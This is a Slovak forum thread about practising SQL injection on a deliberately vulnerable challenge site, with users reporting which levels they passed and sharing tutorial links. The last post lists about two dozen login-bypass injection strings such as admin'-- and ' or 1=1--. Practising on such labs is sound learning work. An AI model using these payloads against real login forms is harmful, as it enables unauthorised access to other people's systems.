SQL injection

Programovacie jazyky, rady, poradňa...
turtlak69
Guru
Guru
Príspevky: 2896
Registrovaný: 10 máj 2007, 15:58
Bydlisko: /dev/null

SQL injection

Príspevok od používateľa turtlak69 »

prejavte svoje vedomosti o sql a skuste sa dostat do systemu :) taka mala simulacia je na stranke http://flack.security-portal.cz a je to oznacene podla levelu zabezpecenia. pochvalte sa do ktoreho levelu ste sa dostali ;)

edit: presiel som prvy level. vypis:
Logged in as: babayaga
:D

edit2: presiel som aj druhy tym istym sposobom ako prvy :) treti sa mi nedari, ale zajtra to skusim ;)
rEnEeK
Medium Star
Medium Star
Používateľov profilový obrázok
Príspevky: 495
Registrovaný: 14 jún 2005, 21:30

Príspevok od používateľa rEnEeK »

1. Level

Logged in as: babayaga
Now try to log in with another user, or just head for the next level.

/login/level1/index.php

2. Level

Logged in as: babayaga
Now try to log in with another user, or just head for the next level.

/login/level2/index.php
ppt
Darca
Darca
Používateľov profilový obrázok
Príspevky: 1920
Registrovaný: 27 máj 2006, 11:24
Kontaktovať používateľa:

Príspevok od používateľa ppt »

Dajte please navod. Skusal som totiz podla viacerych navodov testovat bezpecnost mojich stranok, no ani raz sa mi nepodarilo prihlasit pod mojim loginom (pritom viem, ze proti sql injection som nepouzil ziadnu ochranu). Asi som dost lama, ked sa mi to pomocou navodov nepodarilo. :)
turtlak69
Guru
Guru
Príspevky: 2896
Registrovaný: 10 máj 2007, 15:58
Bydlisko: /dev/null

Príspevok od používateľa turtlak69 »

na tej stranke mas aj "tutorialy" ;) staci kliknut tam hore.
de1x1ter
Light Expert
Light Expert
Príspevky: 40
Registrovaný: 25 jan 2008, 17:13
Kontaktovať používateľa:

Príspevok od používateľa de1x1ter »

som zaciatocnik niejaky postup a tak ...? pokim to prelozim z en :x
xivo
Light Professional
Light Professional
Používateľov profilový obrázok
Príspevky: 752
Registrovaný: 27 jún 2005, 22:49
Bydlisko: Slovensko
Kontaktovať používateľa:

Príspevok od používateľa xivo »

de1x1ter napísal:som zaciatocnik niejaky postup a tak ...? pokim to prelozim z en :x
Mne sa celkom pozdaval pX-ov SQL Injection test
nejedna sa len o OR 1=1, ale nic zlozite na tom nieje ;)

Kód: Vybrať všetko

http://blog.monogram.sk/pokojny/2008/02/18/cvicenie-na-sql-injection/
//IMHO uc sa sam ... a najlepsie z tutorialov, nik ti tu nebude vraviet co a ako ... treba na to nervy, ale ked sa aspon daco podari, ten pocit stoji za to ;) asopn na cjvilku :D
aaaa
Light Star
Light Star
Používateľov profilový obrázok
Príspevky: 241
Registrovaný: 23 okt 2005, 13:22

Príspevok od používateľa aaaa »

Kód: Vybrať všetko

admin'/*
admin'--
' or ''='
' or ''=' or '1'='1
') or (1)=(1) --
') or ('1'='1 --
') or '1'='1 --
'or a=a--
' or 0=0 --
" or 0=0 --
or 0=0 --
' or 0=0 #
" or 0=0 #
or 0=0 #
' or 'x'='x
" or "x"="x
') or ('x'='x
" or 1=1--
or 1=1--
' or a=a--
" or "a"="a
') or ('a'='a
") or ("a"="a
Napísať odpoveď